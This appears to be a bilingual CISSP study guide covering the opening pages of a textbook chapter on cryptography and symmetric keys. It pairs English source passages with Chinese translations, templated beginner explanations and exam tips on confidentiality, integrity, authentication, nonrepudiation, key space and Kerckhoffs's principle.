Chapter 6 Cryptography and Symmetric Key Algorithms THE CISSP TOPICS COVERED IN THIS CHAPTER INCLUDE: Domain 3.0: Security Architecture and Engineering 3.5 Assess and mitigate the vulnerabilities of security architectures, designs, and solution elements 3.5.4 Cryptographic systems 3.6 Select and determine cryptographic solutions 3.6.1 Cryptographic life cycle (e.g., keys, algorithm selection) 3.6.2 Cryptographic methods (e.g., symmetric) Cryptography provides confidentiality, integrity, authentication, and nonrepudiation for sensitive information while it is stored (at rest), traveling across a network (in transit/in motion), and existing in memory (in use/in processing).

Cryptography is an extremely important security technology that is embedded in many of the controls used to protect information from unauthorized visibility and use. Over the years, mathematicians and computer scientists have developed a series of increasingly complex cryptographic algorithms designed to increase the level of protection provided to data. While cryptographers spent time developing strong encryption algorithms, malicious hackers and governments alike devoted significant resources to undermining them. This led to an “arms race” in cryptography and resulted in the development of the extremely sophisticated algorithms in use today.

This chapter looks at the basics of cryptographic communications and the fundamental principles of symmetric key (secret key) cryptosystems. The next chapter continues the discussion of cryptography by examining asymmetric key (public key) cryptosystems and the various techniques attackers use to defeat cryptography.

中文直译 / 整理

第6章 密码学与对称密钥算法 本章涵盖的CISSP主题包括: 领域3.0:安全架构与工程 3.5 评估和缓解安全 架构、设计和解决方案元素的漏洞 3.5.4 密码系统 3.6 选择并确定密码解决方案 3.6.1 密码生命周期(例如,密钥、算法选择) 3.6.2 密码方法(例如,对称加密) 密码学在敏感信息存储(静态)、通过网络传输(传输中/动态)以及存在于内 存中(使用中/处理中)时,提供机密性、完整性、认证和不可否认性性。 密码学 是一种极其重要的安全技术,嵌入在许多用于保护信息免受未授权访问和使用 的控制措施中。 多年来,数学家和计算机科学家开发了一系列日益复杂的密码算法,以提高对 数据的保护级别。 尽管密码学家花费大量时间开发强大的加密算法,但恶意黑 客和政府同样投入了大量资源来破坏这些算法。 这导致了密码学领域的“军备 竞赛”,并促成了当今所使用的极其复杂的算法的诞生。 本章介绍加密通信的基础知识以及对称密钥(私钥)密码系统的根本原理。 下一章将继续探讨密码学,分析非对称密钥(公钥)密码系统以及攻击者 用来破解密码学的各种技术。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

认证:认证是验证“你是不是你声称的那个人”。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“本章考试范围总览”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
学习单元 02 / PDF P373

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Cryptographic Foundations The study of any science must begin with a discussion of the fundamental principles on which it is built. The following sections lay this foundation with a review of the goals of cryptography, an overview of the basic concepts of cryptographic technology, and a look at the major mathematical principles used by cryptographic systems. Goals of Cryptography Security practitioners use cryptographic systems to meet four fundamental goals: confidentiality, integrity, authentication, and nonrepudiation. Achieving each of these goals requires the satisfaction of a number of design requirements, and not all cryptosystems are intended to achieve all four goals.

In the following sections, we'll examine each goal in detail and give a brief description of the technical requirements necessary to achieve it. Confidentiality Confidentiality ensures that data remains private in three different situations: when it is at rest, when it is in transit, and when it is in use. Confidentiality is perhaps the most widely cited goal of cryptosystems—the preservation of secrecy for stored information or for communications between individuals and groups. Two main types of cryptosystems enforce confidentiality: Symmetric cryptosystems use a shared secret key available to all users of the cryptosystem.

Asymmetric cryptosystems use individual pairs of public and private keys for each user of the system. Both of these concepts are explored in the section “Modern Cryptography,” later in this chapter. When developing a cryptographic system for the purpose of providing confidentiality, you must think about the three different types of data that we discussed in Chapter 5, “Protecting Security of Assets”: Data at rest, or stored data, resides in a fixed location awaiting access. Examples of data at rest include data stored on hard drives, backup tapes,

中文直译 / 整理

密码学基础 任何科学的研究都必须从讨论其基础的根本原理开始。 以下各节将通过回顾密 码学的目标、密码技术基本概念的概述,以及密码系统所使用的主要数学原理, 奠定这一基础。 密码学的目标 安全从业者使用密码系统来实现四个基本目标:机密性、完整性、认证和不可 否认性。 实现每个目标都需要满足一系列设计要求,并非所有密码系统都旨在 实现全部四个目标。 在以下各节中,我们将详细探讨每个目标,并简要描述实 现该目标所需的技术要求。 机密性 机密性 确保数据在三种不同情况下保持私密:数据处于静止状态时、传输过程 中以及使用过程中。 机密性或许是密码系统中最常被提及的目标——保护存储信息或个人与群体 之间通信的机密性。 有两种主要类型的密码系统用于强制实现机密性: 对称密码系统使用所有用户共享的密钥。 非对称密码系统为系统中的每个用户使用单独的公钥和私钥对。 本章后面“现代密码学”一节将探讨这两个概念。 在开发用于提供机密性的密码系统时,您必须考虑我们在第5章“保护资产安全” 中讨论的三种不同类型的数据: 静态数据,或存储数据,驻留在固定位置等待访问。 静态数据的例子包括存储 在硬盘、备份磁带上的数据,

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

认证:认证是验证“你是不是你声称的那个人”。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

密码、令牌、生物特征、多因素认证都服务认证。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
认证 认证是验证“你是不是你声称的那个人”。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
学习单元 03 / PDF P374

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

cloud storage services, USB devices, and other storage media. Data in transit, data in motion, or data on the wire is data being transmitted across a network between two systems. Data in motion might be traveling on a corporate network, a wireless network, or the Internet. Data in use is data that is stored in the active memory of a computer system, where it may be accessed by a process running on that system. You should also know that data in transit is also commonly called data on the wire, referring to the network cables that carry data communications. Each of these situations poses different types of confidentiality risks that cryptography can protect against.

For example, data in transit may be susceptible to eavesdropping attacks, whereas data at rest is more susceptible to the theft of physical devices. Data in use may be accessed by unauthorized processes if the operating system does not properly implement process isolation. Integrity Integrity ensures that data is not altered without authorization. If integrity mechanisms are in place, the recipient of a message can be certain that the message received is identical to the message that was sent. Similarly, integrity checks can ensure that stored data was not altered between the time it was created and the time it was accessed.

Integrity controls protect against all forms of alteration, including intentional alteration by a third party attempting to insert false information, intentional deletion of portions of the data, and unintentional alteration by faults in the transmission process. Message integrity is enforced through the use of encrypted message digests, known as digital signatures, created upon transmission of a message. The recipient of the message simply verifies that the message's digital signature is valid, ensuring that the message was not altered in transit. Integrity can be enforced by both public and secret key cryptosystems.

This concept is discussed in detail in Chapter 7, “PKI and Cryptographic Applications.” The

中文直译 / 整理

云存储服务、USB设备和其他存储介质。 传输中的数据、运动中的数据或线路上的数据是指在两个系统之间通 过网络传输的数据。 运动中的数据可能正在企业网络、无线网络或互 联网上传输。 使用中的数据是指存储在计算机系统活动内存中的数据,该数据可被系统上 运行的进程访问。 您还应知道,传输中的数据通常也称为线路上的数据,指的是承 载数据通信的网络电缆。 每种情况都带来了不同类型的机密性风险,而密码学可以防范这些风险。 例如, 传输中的数据可能容易受到窃听攻击,而静态数据则更容易因物理设备被盗而 泄露。 如果操作系统未能正确实现进程隔离,使用中的数据可能被未经授权的 进程访问。 完整性 完整性确保数据未经授权不会被篡改。 如果设置了完整性机制,消息接收方可 以确信接收到的消息与发送的消息完全一致。 同样,完整性检查可以确保存储 的数据在创建到访问期间未被篡改。 完整性控制防范所有形式的篡改,包括第 三方故意插入虚假信息、故意删除数据部分,以及传输过程中因故障导致的无 意篡改。 消息完整性通过使用加密的消息摘要(称为数字签名)在消息传输时生成来保 证。 消息接收方只需验证消息的数字签名是否有效,即可确保消息在传输过程 中未被篡改。

完整性可通过公钥和私钥加密系统共同保证。 此概念在第7章“ PKI与密码学应用”中有详细讨论。 该

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
公钥基础设施 PKI PKI 用证书、CA、注册、吊销等机制管理公钥信任。
学习单元 04 / PDF P375

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

use of cryptographic hash functions to protect file integrity is discussed in Chapter 21, “Malicious Code and Application Attacks.” Authentication Authentication verifies the claimed identity of system users and is a major function of cryptosystems. For example, suppose that Bob wants to establish a communications session with Alice and they are both participants in a shared secret communications system. Alice might use a challenge-response authentication technique to ensure that Bob is who he claims to be. Figure 6.1 shows how this challenge-response protocol would work in action.

In this example, the shared-secret code used by Alice and Bob is quite straightforward—the letters of each word are simply reversed. Bob first contacts Alice and identifies himself. Alice then sends a challenge message to Bob, asking him to encrypt a short message using the secret code known only to Alice and Bob. Bob replies with the encrypted message. After Alice verifies that the encrypted message is correct, she trusts that Bob himself is truly on the other end of the connection. FIGURE 6.1 Challenge-response authentication protocol Nonrepudiation Nonrepudiation provides assurance to the recipient that the message was originated by the sender and not someone masquerading as the sender.

It also prevents the sender from claiming that they never sent the message in the first place (also known as repudiating the message). Secret key, or symmetric key, cryptosystems (such as simple substitution ciphers) do not provide this guarantee of nonrepudiation. If Jim and Bob participate in a secret key communication system, they can both produce the same encrypted message using their shared secret key. Nonrepudiation is offered only by

中文直译 / 整理

使用密码学哈希函数保护文件完整性的内容在第21章“恶意代码与应用程序攻 击”中有详细讨论。 身份验证 身份验证用于验证系统用户所声称的身份,是密码系统的主要功能之一。 例如, 假设鲍勃希望与爱丽丝建立通信会话,而他们都是共享密钥通信系统中的参与 者。 爱丽丝可以使用挑战‑响应身份验证技术来确保鲍勃确实是其自称的那个 人。 图 6.1展示了该挑战‑响应协议的实际工作方式。 在本例中,爱丽丝和鲍勃使用 的共享密钥非常简单——每个单词的字母顺序被简单地反转。 鲍勃首先联系爱 丽丝并标识自己。 随后,爱丽丝向鲍勃发送一条挑战消息,要求他使用只有爱 丽丝和鲍勃知晓的密钥对一条简短消息进行加密。 鲍勃回复加密后的消息。 爱 丽丝验证加密消息正确后,便相信鲍勃确实位于连接的另一端。 图 6.1 挑战‑响应身份验证协议 不可否认性性 不可否认性性向接收方保证消息确实由发送方发出,而非他人冒充发送方。 它还 防止发送方否认自己从未发送过该消息(也称为否认该消息)。 对称密钥加密 系统(如简单的替换密码)无法提供这种不可否认性性保证。 如果吉姆和鲍勃参 与了一个对称密钥通信系统,他们可以使用共享的密钥生成相同的加密消息。 只有

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
学习单元 05 / PDF P376

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

public key, or asymmetric, cryptosystems, a topic discussed in greater detail in Chapter 7. Cryptography Concepts As with any science, you must be familiar with certain terminology before studying cryptography. Let's take a look at a few of the key terms used to describe codes and ciphers. Before a message is put into a coded form, it is known as a plaintext message and is represented by the letter P when encryption functions are described. The sender of a message uses a cryptographic algorithm to encrypt the plaintext message and produce a ciphertext message, represented by the letter C. This message is transmitted by some physical or electronic means to the recipient.

The recipient then uses a predetermined algorithm to decrypt the ciphertext message and retrieve the plaintext version. (For an illustration of this process, see Figure 6.3 later in this chapter.) All cryptographic algorithms rely on keys to maintain their security. For the most part, a key is nothing more than a number. It's usually a very large binary number, but it's a number nonetheless. Every algorithm has a specific key space. The key space is the range of values that are valid for use as a key for a specific algorithm. A key space is defined by its bit size. Bit size is nothing more than the number of binary bits (0s and 1s) in the key.

The key space is the range between the key that has all 0s and the key that has all 1s. Or to state it another way, the key space is the range of numbers from 0 to 2n, where n is the bit size of the key. So, a 128-bit key can have a value from 0 to 2128 (which is roughly 3.40282367 × 1038, a very big number!). It is absolutely critical to protect the security of secret keys and private keys. In fact, all of the security you gain from cryptography rests on your ability to keep the secret and private keys confidential.

中文直译 / 整理

公钥或非对称加密系统才能提供不可否认性性,这一主题将在第7章中详细讨论。 密码学概念 与任何科学一样,在学习密码学之前,您必须熟悉某些术语。 让我们来看看用 于描述编码和密码的一些关键术语。 在消息被转换为编码形式之前,它被称为 明文消息,在描述加密函数时用字母P表示。 消息的发送方使用加密算法对加密 明文消息,生成密文消息,用字母C表示。 该消息通过某种物理或电子方式传输 给接收方。 接收方则使用预定义的算法对解密密文消息,恢复出明文版本。 (有关此过程的图示,请参见本章后面的图6.3。 ) 所有加密算法都依赖 密钥 来维持其安全性。 在大多数情况下,密钥不过是一个 数字。 它通常是一个非常大的二进制数,但归根结底仍是一个数字。 每个算法 都有特定的 密钥空间。 密钥空间是指适用于特定算法的合法密钥值范围。 密钥 空间由其 位长度 定义。 位长度仅仅是密钥中二进制位(0 和 1)的数量。 密钥 空间是从全为 0 的密钥到全为 1 的密钥之间的范围。 或者换一种说法,密钥空 间是介于 0 到 2n 之间的数字范围,其中 n 是密钥的位长度。

因此,一个 128 位 的密钥其值范围为 0 到 2128 (大约为 3.40282367 × 1038,一个非常大的数字! )。 保护秘密密钥和私钥的安全至关重要。 事实上,您从加密中获得的所有安全性 都取决于您能否使秘密密钥和私钥保持机密。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

数字签名、审计日志、交易记录和证书常支持不可否认性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

公钥加密、私钥签名是核心记忆点。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 06 / PDF P377

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Kerckhoffs's Principle All cryptography relies on algorithms. An algorithm is a set of rules, usually mathematical, that dictates how encryption and decryption processes are to take place. Most cryptographers follow Kerckhoffs's principle, a concept that makes algorithms known and public, allowing anyone to examine and test them. Specifically, Kerckhoffs's principle (also known as Kerckhoffs's assumption) is that a cryptographic system should be secure even if everything about the system, except the key, is public knowledge. The principle can be summed up as “The enemy knows the system.” A large number of cryptographers adhere to this principle, but not all agree.

In fact, some believe that better overall security can be maintained by keeping both the algorithm and the key private. Kerckhoffs's adherents retort that the opposite approach includes the dubious practice of “security through obscurity” and believe that public exposure produces more activity and exposes more weaknesses more readily, leading to the abandonment of insufficiently strong algorithms and quicker adoption of suitable ones. As you'll learn in this chapter and the next, different types of algorithms require different types of keys. In symmetric key (or secret key) cryptosystems, all participants use a single shared key.

In public key cryptosystems, each participant has their own pair of public and private keys. Cryptographic keys are sometimes referred to as cryptovariables, particularly in U.S. government applications. The art of creating and implementing secret codes and ciphers is known as cryptography. This practice is paralleled by the art of cryptanalysis—the study of methods to defeat codes and ciphers. Together, cryptography and cryptanalysis are commonly referred to as cryptology. Specific implementations of a code or cipher in hardware and software are known as cryptosystems.

Federal Information Processing Standard (FIPS) 140–3, “Security Requirements for Cryptographic Modules,” defines the hardware and software requirements for cryptographic modules that the federal government uses. Kerckhoffs

中文直译 / 整理

原则 所有加密都依赖于算法。 一个 算法 是一组规则,通常是数学规则,用于规 定加密和解密过程如何进行。 大多数密码学家遵循克尔克霍夫原则,该原 则使算法公开透明,允许任何人对其进行检查和测试。 具体而言,克尔克 霍夫原则(也称为克尔克霍夫假设)是指:即使系统的全部细节(密钥除 外)均为公众所知,密码系统也应保持安全。 该原则可概括为:“敌人了 解系统。 ” 许多密码学家遵循这一原则,但并非所有人都同意。 事实上,有些人认为, 通过同时保密算法和密钥,可以更好地维持整体安全性。 Kerckhoffs 的支 持者反驳称,相反的做法包含了“通过隐蔽实现安全”这一可疑的实践,并 相信公开暴露能带来更多活动,更迅速地暴露更多弱点,从而促使不够强大 的算法被淘汰,并更快地采用合适的算法。 正如您将在本章和下一章中学到的,不同类型的算法需要不同类型的密钥。 在 对称密钥(或秘密密钥)加密系统中,所有参与者使用一个共享密钥。 在公钥 加密系统中,每个参与者都有自己的公钥和私钥对。 加密密钥有时被称为 cryptovariables,尤其是在美国政府应用中。 创建和实施秘密密码和密码系统的艺术被称为 cryptography。

这一实践与 cryptanalysis——研究破解密码和密码系统的方法的艺术——相平行。 密码学 和密码分析共同通常被称为 cryptology。 密码或密码在硬件和软件中的具体 实现被称为 cryptosystems。 联邦信息处理标准(FIPS)140–3《密码模块的安全要求》定义了联 邦政府使用的密码模块的硬件和软件要求。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 07 / PDF P378

第 378 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Cryptographic Mathematics Cryptography is no different from most computer science disciplines in that it finds its foundations in the science of mathematics. To fully understand cryptography, you must first understand the basics of binary mathematics and the logical operations used to manipulate binary values. The following sections present a brief look at some of the most fundamental concepts with which you should be familiar. Boolean Mathematics Boolean mathematics defines the rules used for the bits and bytes that form the nervous system of any computer. You're most likely familiar with the decimal system.

It is a base 10 system in which an integer from 0 to 9 is used in each place and each place value is a multiple of 10. It's likely that our reliance on the decimal system has biological origins—human beings have 10 fingers that can be used to count. Boolean math can be very confusing at first, but it's worth the investment of time to learn how logical functions work. You need to know these concepts to truly understand the inner workings of cryptographic algorithms. Similarly, the computer's reliance on the Boolean system has electrical origins.

In an electrical circuit, there are only two possible states—on (representing the presence of electrical current) and off (representing the absence of electrical current). All computation performed by an electrical device must be expressed in these terms, giving rise to the use of Boolean computation in modern electronics. In general, computer scientists refer to the on condition as a true value and the off condition as a false value. Logical Operations The Boolean mathematics of cryptography uses a variety of logical functions to manipulate data. We'll take a brief look at several of these operations. AND

中文直译 / 整理

密码学数学 密码学与其他计算机科学学科并无不同,其基础在于数学科学。 要全面理解密 码学,您必须首先掌握二进制数学和用于操作二进制值的逻辑运算的基本知识。 以下部分简要介绍了一些您应熟悉的核心概念。 布尔数学 布尔数学定义了构成任何计算机神经系统的基本位和字节所遵循的规则。 您很 可能熟悉十进制系统。 它是一种十进制系统,每个位置使用0到9之间的整数, 且每个位置的值都是10的倍数。 我们对十进制系统的依赖很可能源于生物学因 素——人类有10根手指可用于计数。 布尔数学起初可能非常令人困惑,但投入时间学习逻辑函数的工作原理 是值得的。 要真正理解加密算法的内部工作原理,您必须掌握这些概念。 同样,计算机对布尔系统的依赖具有电气起源。 在电路中,只有两种可能的 状态——开(表示电流存在)和关(表示电流不存在)。 所有由电气设备执 行的计算都必须以这些术语表达,从而催生了布尔计算在现代电子学中的应 用。 通常,计算机科学家将开状态称为真值,将关状态称为假值。 逻辑运算 密码学中的布尔数学使用多种逻辑函数来操作数据。 我们将简要介绍其中几种操 作。 AND

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 378 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

